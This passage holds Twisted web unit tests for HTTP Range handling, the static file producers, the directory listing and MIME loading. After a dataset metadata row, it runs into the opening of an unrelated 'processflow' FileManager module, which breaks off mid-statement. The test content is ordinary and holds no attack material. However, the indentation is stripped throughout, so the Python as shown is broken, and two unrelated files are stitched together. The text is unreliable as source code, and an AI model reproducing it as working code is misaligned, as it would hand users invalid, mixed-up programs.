                rb'multipart/byteranges; boundary="[^"]*"\Z', contentType))
# Content-encoding is not set in the response to a multiple range
# response, which is a bit wussy but works well enough with the way
# static.File does content-encodings...
self.assertNotIn(b'content-encoding', contentHeaders)
def test_multipleUnsatisfiableRangesReturnsMultipleRangeStaticProducer(self):
"""
        makeProducer still returns an instance of L{MultipleRangeStaticProducer}
when the Range header requests multiple ranges, none of which are
satisfiable.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=10-12,15-20')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.MultipleRangeStaticProducer)
def test_multipleUnsatisfiableRangesSets416ReqestedRangeNotSatisfiable(self):
"""
        makeProducer sets the response code of the request to 'Requested
Range Not Satisfiable' when the Range header requests multiple ranges,
none of which are satisfiable.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=10-12,15-20')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.REQUESTED_RANGE_NOT_SATISFIABLE, request.responseCode)
def test_multipleUnsatisfiableRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests multiple ranges, none of
which are satisfiable, sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
contentType = "text/plain"
request.requestHeaders.addRawHeader(b'range', b'bytes=10-12,15-20')
resource = self.makeResourceWithContent(b'abc', type=contentType)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-length': b'0',
b'content-range': b'bytes */3',
b'content-type': b'text/plain'},
self.contentHeaders(request))
def test_oneSatisfiableRangeIsEnough(self):
"""
makeProducer when the Range header requests multiple ranges, at least
one of which matches, sets the response code to 'Partial Content'.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,100-200')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
class StaticProducerTests(TestCase):
"""
Tests for the abstract L{StaticProducer}.
"""
def test_stopProducingClosesFile(self):
"""
L{StaticProducer.stopProducing} closes the file object the producer is
producing data from.
"""
fileObject = StringIO()
producer = static.StaticProducer(None, fileObject)
producer.stopProducing()
self.assertTrue(fileObject.closed)
def test_stopProducingSetsRequestToNone(self):
"""
L{StaticProducer.stopProducing} sets the request instance variable to
None, which indicates to subclasses' resumeProducing methods that no
more data should be produced.
"""
fileObject = StringIO()
producer = static.StaticProducer(DummyRequest([]), fileObject)
producer.stopProducing()
self.assertIdentical(None, producer.request)
class NoRangeStaticProducerTests(TestCase):
"""
Tests for L{NoRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{NoRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.NoRangeStaticProducer(None, None))
def test_resumeProducingProducesContent(self):
"""
L{NoRangeStaticProducer.resumeProducing} writes content from the
resource to the request.
"""
request = DummyRequest([])
content = b'abcdef'
producer = static.NoRangeStaticProducer(
request, StringIO(content))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual(content, b''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{NoRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
"""
request = DummyRequest([])
bufferSize = abstract.FileDescriptor.bufferSize
content = b'a' * (2*bufferSize + 1)
producer = static.NoRangeStaticProducer(
request, StringIO(content))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
expected = [
content[0:bufferSize],
content[bufferSize:2*bufferSize],
content[2*bufferSize:]
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{NoRangeStaticProducer.resumeProducing} calls finish() on the request
after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.NoRangeStaticProducer(
request, StringIO(b'abcdef'))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class SingleRangeStaticProducerTests(TestCase):
"""
Tests for L{SingleRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{SingleRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.SingleRangeStaticProducer(None, None, None, None))
def test_resumeProducingProducesContent(self):
"""
L{SingleRangeStaticProducer.resumeProducing} writes the given amount
of content, starting at the given offset, from the resource to the
request.
"""
request = DummyRequest([])
content = b'abcdef'
producer = static.SingleRangeStaticProducer(
request, StringIO(content), 1, 3)
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
self.assertEqual(content[1:4], b''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{SingleRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
"""
request = DummyRequest([])
bufferSize = abstract.FileDescriptor.bufferSize
content = b'abc' * bufferSize
producer = static.SingleRangeStaticProducer(
request, StringIO(content), 1, bufferSize+10)
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
expected = [
content[1:bufferSize+1],
content[bufferSize+1:bufferSize+11],
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{SingleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.SingleRangeStaticProducer(
request, StringIO(b'abcdef'), 1, 1)
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class MultipleRangeStaticProducerTests(TestCase):
"""
Tests for L{MultipleRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{MultipleRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.MultipleRangeStaticProducer(None, None, None))
def test_resumeProducingProducesContent(self):
"""
L{MultipleRangeStaticProducer.resumeProducing} writes the requested
chunks of content from the resource to the request, with the supplied
boundaries in between each chunk.
"""
request = DummyRequest([])
content = b'abcdef'
producer = static.MultipleRangeStaticProducer(
request, StringIO(content), [(b'1', 1, 3), (b'2', 5, 1)])
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
self.assertEqual(b'1bcd2f', b''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{MultipleRangeStaticProducer.start} writes about
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
To be specific about the 'about' above: it can write slightly more,
for example in the case where the first boundary plus the first chunk
        is less than C{bufferSize} but the first boundary plus the first chunk
plus the second boundary is more, but this is unimportant as in
practice the boundaries are fairly small. On the other side, it is
important for performance to bundle up several small chunks into one
call to request.write.
"""
request = DummyRequest([])
content = b'0123456789' * 2
producer = static.MultipleRangeStaticProducer(
request, StringIO(content),
[(b'a', 0, 2), (b'b', 5, 10), (b'c', 0, 0)])
producer.bufferSize = 10
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
expected = [
b'a' + content[0:2] + b'b' + content[5:11],
content[11:15] + b'c',
]
self.assertEqual(expected, request.written)
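    # Worked arithmetic for the expected split above, using the test's own data
    # and the bufferSize of 10 forced a few lines earlier: boundary b'a' (1) +
    # content[0:2] (2) + boundary b'b' (1) + content[5:11] (6) fills the 10-byte
    # buffer and becomes the first write; the remaining content[11:15] (4) plus
    # the final boundary b'c' make up the second write.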
def test_finishCalledWhenDone(self):
"""
L{MultipleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.MultipleRangeStaticProducer(
request, StringIO(b'abcdef'), [(b'', 1, 2)])
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class RangeTests(TestCase):
"""
Tests for I{Range-Header} support in L{twisted.web.static.File}.
@type file: L{file}
@ivar file: Temporary (binary) file containing the content to be served.
@type resource: L{static.File}
@ivar resource: A leaf web resource using C{file} as content.
@type request: L{DummyRequest}
@ivar request: A fake request, requesting C{resource}.
@type catcher: L{list}
@ivar catcher: List which gathers all log information.
"""
def setUp(self):
"""
Create a temporary file with a fixed payload of 64 bytes. Create a
resource for that file and create a request which will be for that
resource. Each test can set a different range header to test different
aspects of the implementation.
"""
path = FilePath(self.mktemp())
# This is just a jumble of random stuff. It's supposed to be a good
# set of data for this test, particularly in order to avoid
# accidentally seeing the right result by having a byte sequence
# repeated at different locations or by having byte values which are
# somehow correlated with their position in the string.
self.payload = (b'\xf8u\xf3E\x8c7\xce\x00\x9e\xb6a0y0S\xf0\xef\xac\xb7'
b'\xbe\xb5\x17M\x1e\x136k{\x1e\xbe\x0c\x07\x07\t\xd0'
b'\xbckY\xf5I\x0b\xb8\x88oZ\x1d\x85b\x1a\xcdk\xf2\x1d'
b'&\xfd%\xdd\x82q/A\x10Y\x8b')
path.setContent(self.payload)
self.file = path.open()
self.resource = static.File(self.file.name)
self.resource.isLeaf = 1
self.request = DummyRequest([b''])
self.request.uri = self.file.name
self.catcher = []
log.addObserver(self.catcher.append)
def tearDown(self):
"""
Clean up the resource file and the log observer.
"""
self.file.close()
log.removeObserver(self.catcher.append)
def _assertLogged(self, expected):
"""
Asserts that a given log message occurred with an expected message.
"""
logItem = self.catcher.pop()
self.assertEqual(logItem["message"][0], expected)
self.assertEqual(
self.catcher, [], "An additional log occurred: %r" % (logItem,))
def test_invalidRanges(self):
"""
L{File._parseRangeHeader} raises L{ValueError} when passed
syntactically invalid byte ranges.
"""
f = self.resource._parseRangeHeader
# there's no =
self.assertRaises(ValueError, f, b'bytes')
# unknown isn't a valid Bytes-Unit
self.assertRaises(ValueError, f, b'unknown=1-2')
# there's no - in =stuff
self.assertRaises(ValueError, f, b'bytes=3')
# both start and end are empty
self.assertRaises(ValueError, f, b'bytes=-')
# start isn't an integer
self.assertRaises(ValueError, f, b'bytes=foo-')
# end isn't an integer
self.assertRaises(ValueError, f, b'bytes=-foo')
# end isn't equal to or greater than start
self.assertRaises(ValueError, f, b'bytes=5-4')
def test_rangeMissingStop(self):
"""
A single bytes range without an explicit stop position is parsed into a
two-tuple giving the start position and L{None}.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=0-'), [(0, None)])
def test_rangeMissingStart(self):
"""
A single bytes range without an explicit start position is parsed into
a two-tuple of L{None} and the end position.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=-3'), [(None, 3)])
def test_range(self):
"""
A single bytes range with explicit start and stop positions is parsed
into a two-tuple of those positions.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=2-5'), [(2, 5)])
def test_rangeWithSpace(self):
"""
A single bytes range with whitespace in allowed places is parsed in
the same way as it would be without the whitespace.
"""
self.assertEqual(
self.resource._parseRangeHeader(b' bytes=1-2 '), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes =1-2 '), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes= 1-2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1 -2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1- 2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1-2 '), [(1, 2)])
def test_nullRangeElements(self):
"""
If there are multiple byte ranges but only one is non-null, the
non-null range is parsed and its start and stop returned.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1-2,\r\n, ,\t'), [(1, 2)])
def test_multipleRanges(self):
"""
If multiple byte ranges are specified their starts and stops are
returned.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1-2,3-4'),
[(1, 2), (3, 4)])
def test_bodyLength(self):
"""
A correct response to a range request is as long as the length of the
requested range.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=0-43')
self.resource.render(self.request)
self.assertEqual(len(b''.join(self.request.written)), 44)
def test_invalidRangeRequest(self):
"""
        An incorrect range request (RFC 2616 defines a correct range request as
        a Bytes-Unit followed by a '=' character followed by a specific range;
        only 'bytes' is defined as a Bytes-Unit) results in the range header
        value being logged and a normal 200 response being sent.
"""
range = b'foobar=0-43'
self.request.requestHeaders.addRawHeader(b'range', range)
self.resource.render(self.request)
expected = "Ignoring malformed Range header %r" % (range.decode(),)
self._assertLogged(expected)
self.assertEqual(b''.join(self.request.written), self.payload)
self.assertEqual(self.request.responseCode, http.OK)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'%d' % (len(self.payload),))
def parseMultipartBody(self, body, boundary):
"""
Parse C{body} as a multipart MIME response separated by C{boundary}.
        Note that this will fail the calling test on certain syntactic
problems.
"""
sep = b"\r\n--" + boundary
parts = body.split(sep)
self.assertEqual(b'', parts[0])
self.assertEqual(b'--\r\n', parts[-1])
parsed_parts = []
for part in parts[1:-1]:
before, header1, header2, blank, partBody = part.split(b'\r\n', 4)
headers = header1 + b'\n' + header2
self.assertEqual(b'', before)
self.assertEqual(b'', blank)
partContentTypeValue = re.search(
b'^content-type: (.*)$', headers, re.I|re.M).group(1)
start, end, size = re.search(
b'^content-range: bytes ([0-9]+)-([0-9]+)/([0-9]+)$',
headers, re.I|re.M).groups()
parsed_parts.append(
{b'contentType': partContentTypeValue,
b'contentRange': (start, end, size),
b'body': partBody})
return parsed_parts
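    # For reference, the body shape this helper expects (reconstructed from the
    # parsing logic above; the boundary value itself is illustrative):
    #
    #   \r\n--<boundary>\r\n
    #   Content-Type: text/plain\r\n
    #   Content-Range: bytes 0-2/64\r\n
    #   \r\n
    #   <part bytes>
    #   ... repeated for each requested range ...
    #   \r\n--<boundary>--\r\n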
def test_multipleRangeRequest(self):
"""
The response to a request for multiple bytes ranges is a MIME-ish
multipart response.
"""
startEnds = [(0, 2), (20, 30), (40, 50)]
rangeHeaderValue = b','.join([networkString("%s-%s" % (s,e)) for (s, e) in startEnds])
self.request.requestHeaders.addRawHeader(b'range',
b'bytes=' + rangeHeaderValue)
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
boundary = re.match(
b'^multipart/byteranges; boundary="(.*)"$',
self.request.responseHeaders.getRawHeaders(b'content-type')[0]).group(1)
parts = self.parseMultipartBody(b''.join(self.request.written), boundary)
self.assertEqual(len(startEnds), len(parts))
for part, (s, e) in zip(parts, startEnds):
self.assertEqual(networkString(self.resource.type),
part[b'contentType'])
start, end, size = part[b'contentRange']
self.assertEqual(int(start), s)
self.assertEqual(int(end), e)
self.assertEqual(int(size), self.resource.getFileSize())
self.assertEqual(self.payload[s:e+1], part[b'body'])
def test_multipleRangeRequestWithRangeOverlappingEnd(self):
"""
The response to a request for multiple bytes ranges is a MIME-ish
multipart response, even when one of the ranged falls off the end of
the resource.
"""
startEnds = [(0, 2), (40, len(self.payload) + 10)]
rangeHeaderValue = b','.join([networkString("%s-%s" % (s,e)) for (s, e) in startEnds])
self.request.requestHeaders.addRawHeader(b'range',
b'bytes=' + rangeHeaderValue)
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
boundary = re.match(
b'^multipart/byteranges; boundary="(.*)"$',
self.request.responseHeaders.getRawHeaders(b'content-type')[0]).group(1)
parts = self.parseMultipartBody(b''.join(self.request.written), boundary)
self.assertEqual(len(startEnds), len(parts))
for part, (s, e) in zip(parts, startEnds):
self.assertEqual(networkString(self.resource.type),
part[b'contentType'])
start, end, size = part[b'contentRange']
self.assertEqual(int(start), s)
self.assertEqual(int(end), min(e, self.resource.getFileSize()-1))
self.assertEqual(int(size), self.resource.getFileSize())
self.assertEqual(self.payload[s:e+1], part[b'body'])
def test_implicitEnd(self):
"""
If the end byte position is omitted, then it is treated as if the
length of the resource was specified by the end byte position.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=23-')
self.resource.render(self.request)
self.assertEqual(b''.join(self.request.written), self.payload[23:])
self.assertEqual(len(b''.join(self.request.written)), 41)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 23-63/64')
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'41')
def test_implicitStart(self):
"""
If the start byte position is omitted but the end byte position is
supplied, then the range is treated as requesting the last -N bytes of
the resource, where N is the end byte position.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=-17')
self.resource.render(self.request)
self.assertEqual(b''.join(self.request.written), self.payload[-17:])
self.assertEqual(len(b''.join(self.request.written)), 17)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 47-63/64')
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'17')
def test_explicitRange(self):
"""
A correct response to a bytes range header request from A to B starts
with the A'th byte and ends with (including) the B'th byte. The first
byte of a page is numbered with 0.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=3-43')
self.resource.render(self.request)
written = b''.join(self.request.written)
self.assertEqual(written, self.payload[3:44])
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 3-43/64')
self.assertEqual(
b'%d' % (len(written),),
self.request.responseHeaders.getRawHeaders(b'content-length')[0])
def test_explicitRangeOverlappingEnd(self):
"""
A correct response to a bytes range header request from A to B when B
is past the end of the resource starts with the A'th byte and ends
with the last byte of the resource. The first byte of a page is
numbered with 0.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=40-100')
self.resource.render(self.request)
written = b''.join(self.request.written)
self.assertEqual(written, self.payload[40:])
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 40-63/64')
self.assertEqual(
b'%d' % (len(written),),
self.request.responseHeaders.getRawHeaders(b'content-length')[0])
def test_statusCodeRequestedRangeNotSatisfiable(self):
"""
If a range is syntactically invalid due to the start being greater than
the end, the range header is ignored (the request is responded to as if
it were not present).
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=20-13')
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.OK)
self.assertEqual(b''.join(self.request.written), self.payload)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'%d' % (len(self.payload),))
def test_invalidStartBytePos(self):
"""
If a range is unsatisfiable due to the start not being less than the
length of the resource, the response is 416 (Requested range not
satisfiable) and no data is written to the response body (RFC 2616,
section 14.35.1).
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=67-108')
self.resource.render(self.request)
self.assertEqual(
self.request.responseCode, http.REQUESTED_RANGE_NOT_SATISFIABLE)
self.assertEqual(b''.join(self.request.written), b'')
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'0')
# Sections 10.4.17 and 14.16
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
networkString('bytes */%d' % (len(self.payload),)))
class DirectoryListerTests(TestCase):
"""
Tests for L{static.DirectoryLister}.
"""
def _request(self, uri):
request = DummyRequest([b''])
request.uri = uri
return request
def test_renderHeader(self):
"""
        L{static.DirectoryLister} prints the request uri as the header of the
rendered content.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo'))
self.assertIn(b"<h1>Directory listing for foo</h1>", data)
self.assertIn(b"<title>Directory listing for foo</title>", data)
def test_renderUnquoteHeader(self):
"""
        L{static.DirectoryLister} unquotes the request uri before printing it.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo%20bar'))
self.assertIn(b"<h1>Directory listing for foo bar</h1>", data)
self.assertIn(b"<title>Directory listing for foo bar</title>", data)
def test_escapeHeader(self):
"""
        L{static.DirectoryLister} escapes "&", "<" and ">" after unquoting the
request uri.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo%26bar'))
self.assertIn(b"<h1>Directory listing for foo&bar</h1>", data)
self.assertIn(b"<title>Directory listing for foo&bar</title>", data)
def test_renderFiles(self):
"""
L{static.DirectoryLister} is able to list all the files inside a
directory.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('file1').setContent(b"content1")
path.child('file2').setContent(b"content2" * 1000)
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo'))
body = b"""<tr class="odd">
<td><a href="file1">file1</a></td>
<td>8B</td>
<td>[text/html]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="file2">file2</a></td>
<td>7K</td>
<td>[text/html]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_renderDirectories(self):
"""
L{static.DirectoryLister} is able to list all the directories inside
a directory.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('dir1').makedirs()
path.child('dir2 & 3').makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo'))
body = b"""<tr class="odd">
<td><a href="dir1/">dir1/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="dir2%20%26%203/">dir2 & 3/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_renderFiltered(self):
"""
        L{static.DirectoryLister} takes an optional C{dirs} argument that
        filters the list of directories and files printed.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('dir1').makedirs()
path.child('dir2').makedirs()
path.child('dir3').makedirs()
lister = static.DirectoryLister(path.path, dirs=["dir1", "dir3"])
data = lister.render(self._request(b'foo'))
body = b"""<tr class="odd">
<td><a href="dir1/">dir1/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="dir3/">dir3/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_oddAndEven(self):
"""
        L{static.DirectoryLister} alternates the CSS class between odd and
        even rows of the table.
"""
lister = static.DirectoryLister(None)
elements = [{"href": "", "text": "", "size": "", "type": "",
"encoding": ""} for i in range(5)]
content = lister._buildTableContent(elements)
self.assertEqual(len(content), 5)
self.assertTrue(content[0].startswith('<tr class="odd">'))
self.assertTrue(content[1].startswith('<tr class="even">'))
self.assertTrue(content[2].startswith('<tr class="odd">'))
self.assertTrue(content[3].startswith('<tr class="even">'))
self.assertTrue(content[4].startswith('<tr class="odd">'))
def test_contentType(self):
"""
L{static.DirectoryLister} produces a MIME-type that indicates that it is
HTML, and includes its charset (UTF-8).
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
req = self._request(b'')
lister.render(req)
self.assertEqual(req.responseHeaders.getRawHeaders(b'content-type')[0],
b"text/html; charset=utf-8")
def test_mimeTypeAndEncodings(self):
"""
L{static.DirectoryLister} is able to detect mimetype and encoding of
listed files.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('file1.txt').setContent(b"file1")
path.child('file2.py').setContent(b"python")
path.child('file3.conf.gz').setContent(b"conf compressed")
path.child('file4.diff.bz2').setContent(b"diff compressed")
directory = os.listdir(path.path)
directory.sort()
contentTypes = {
".txt": "text/plain",
".py": "text/python",
".conf": "text/configuration",
".diff": "text/diff"
}
lister = static.DirectoryLister(path.path, contentTypes=contentTypes)
dirs, files = lister._getFilesAndDirectories(directory)
self.assertEqual(dirs, [])
self.assertEqual(files, [
{'encoding': '',
'href': 'file1.txt',
'size': '5B',
'text': 'file1.txt',
'type': '[text/plain]'},
{'encoding': '',
'href': 'file2.py',
'size': '6B',
'text': 'file2.py',
'type': '[text/python]'},
{'encoding': '[gzip]',
'href': 'file3.conf.gz',
'size': '15B',
'text': 'file3.conf.gz',
'type': '[text/configuration]'},
{'encoding': '[bzip2]',
'href': 'file4.diff.bz2',
'size': '15B',
'text': 'file4.diff.bz2',
'type': '[text/diff]'}])
@skipIf(not platform._supportsSymlinks(), "No symlink support")
def test_brokenSymlink(self):
"""
        If one of the files in the listing is a broken symlink, it should not
        be returned by L{static.DirectoryLister._getFilesAndDirectories}.
"""
path = FilePath(self.mktemp())
path.makedirs()
file1 = path.child('file1')
file1.setContent(b"file1")
file1.linkTo(path.child("file2"))
file1.remove()
lister = static.DirectoryLister(path.path)
directory = os.listdir(path.path)
directory.sort()
dirs, files = lister._getFilesAndDirectories(directory)
self.assertEqual(dirs, [])
self.assertEqual(files, [])
def test_childrenNotFound(self):
"""
Any child resource of L{static.DirectoryLister} renders an HTTP
I{NOT FOUND} response code.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
request = self._request(b'')
child = resource.getChildForRequest(lister, request)
result = _render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, http.NOT_FOUND)
result.addCallback(cbRendered)
return result
def test_repr(self):
"""
L{static.DirectoryLister.__repr__} gives the path of the lister.
"""
path = FilePath(self.mktemp())
lister = static.DirectoryLister(path.path)
self.assertEqual(repr(lister),
"<DirectoryLister of %r>" % (path.path,))
self.assertEqual(str(lister),
"<DirectoryLister of %r>" % (path.path,))
def test_formatFileSize(self):
"""
        L{static.formatFileSize} formats a number of bytes into a more
        readable string.
"""
self.assertEqual(static.formatFileSize(0), "0B")
self.assertEqual(static.formatFileSize(123), "123B")
self.assertEqual(static.formatFileSize(4567), "4K")
self.assertEqual(static.formatFileSize(8900000), "8M")
self.assertEqual(static.formatFileSize(1234000000), "1G")
self.assertEqual(static.formatFileSize(1234567890000), "1149G")
class LoadMimeTypesTests(TestCase):
"""
Tests for the MIME type loading routine.
@cvar UNSET: A sentinel to signify that C{self.paths} has not been set by
the mock init.
"""
UNSET = object()
def setUp(self):
self.paths = self.UNSET
def _fakeInit(self, paths):
"""
A mock L{mimetypes.init} that records the value of the passed C{paths}
argument.
@param paths: The paths that will be recorded.
"""
self.paths = paths
def test_defaultArgumentIsNone(self):
"""
By default, L{None} is passed to C{mimetypes.init}.
"""
static.loadMimeTypes(init=self._fakeInit)
self.assertIdentical(self.paths, None)
def test_extraLocationsWork(self):
"""
Passed MIME type files are passed to C{mimetypes.init}.
"""
paths = ["x", "y", "z"]
static.loadMimeTypes(paths, init=self._fakeInit)
self.assertIdentical(self.paths, paths)
def test_usesGlobalInitFunction(self):
"""
By default, C{mimetypes.init} is called.
"""
# Checking mimetypes.inited doesn't always work, because
# something, somewhere, calls mimetypes.init. Yay global
# mutable state :)
if getattr(inspect, "signature", None):
signature = inspect.signature(static.loadMimeTypes)
self.assertIs(signature.parameters["init"].default,
mimetypes.init)
else:
args, _, _, defaults = inspect.getargspec(static.loadMimeTypes)
defaultInit = defaults[args.index("init")]
self.assertIs(defaultInit, mimetypes.init)
class StaticDeprecationTests(TestCase):
def test_addSlashDeprecated(self):
"""
L{twisted.web.static.addSlash} is deprecated.
"""
from twisted.web.static import addSlash
addSlash(DummyRequest([b'']))
warnings = self.flushWarnings([self.test_addSlashDeprecated])
self.assertEqual(len(warnings), 1)
self.assertEqual(warnings[0]['message'],
"twisted.web.static.addSlash was deprecated in Twisted 16.0.0")
| 36.635332 | 102 | 0.617383 | [
"MIT",
"Unlicense"
] | ikingye/twisted | src/twisted/web/test/test_static.py | 67,812 | Python |
import os
import re
import sys
import threading
import logging
import random
from time import sleep
from peewee import *
from enum import IntEnum
from threading import Thread
from models import DataFile
from lib.jobstatus import JobStatus
from lib.util import print_debug
from lib.util import print_line
from lib.util import print_message
class FileStatus(IntEnum):
PRESENT = 0
NOT_PRESENT = 1
IN_TRANSIT = 2
class FileManager(object):
"""
Manage all files required by jobs
"""
def __init__(self, event_list, config, database='processflow.db'):
"""
Parameters:
database (str): the path to where to create the sqlite database file
config (dict): the global configuration dict
"""
self._event_list = event_list
self._db_path = database
self._config = config
if os.path.exists(database):
os.remove(database)
DataFile._meta.database.init(database)
if DataFile.table_exists():
DataFile.drop_table()
DataFile.create_table()
self.thread_list = list()
self.kill_event = threading.Event()
def __str__(self):
# TODO: make this better
return str({
'db_path': self._db_path,
})
def get_endpoints(self):
"""
Return a list of globus endpoints for all cases
"""
q = (DataFile
.select()
.where(
DataFile.transfer_type == 'globus'))
endpoints = list()
for x in q.execute():
if x.remote_uuid not in endpoints:
endpoints.append(x.remote_uuid)
return endpoints
def write_database(self):
"""
Write out a human readable version of the database for debug purposes
"""
file_list_path = os.path.join(
self._config['global']['project_path'],
'output',
'file_list.txt')
with open(file_list_path, 'w') as fp:
try:
for case in self._config['simulations']:
if case in ['start_year', 'end_year', 'comparisons']:
continue
fp.write('+++++++++++++++++++++++++++++++++++++++++++++')
fp.write('\n\t{case}\t\n'.format(case=case))
fp.write('+++++++++++++++++++++++++++++++++++++++++++++\n')
q = (DataFile
.select(DataFile.datatype)
.where(DataFile.case == case)
.distinct())
for df_type in q.execute():
_type = df_type.datatype
fp.write('===================================\n')
fp.write('\t' + _type + ':\n')
datafiles = (DataFile
.select()
.where(
(DataFile.datatype == _type) &
(DataFile.case == case)))
for datafile in datafiles.execute():
filestr = '-------------------------------------'
filestr += '\n\t name: ' + datafile.name + '\n\t local_status: '
if datafile.local_status == 0:
filestr += ' present, '
elif datafile.local_status == 1:
filestr += ' missing, '
else:
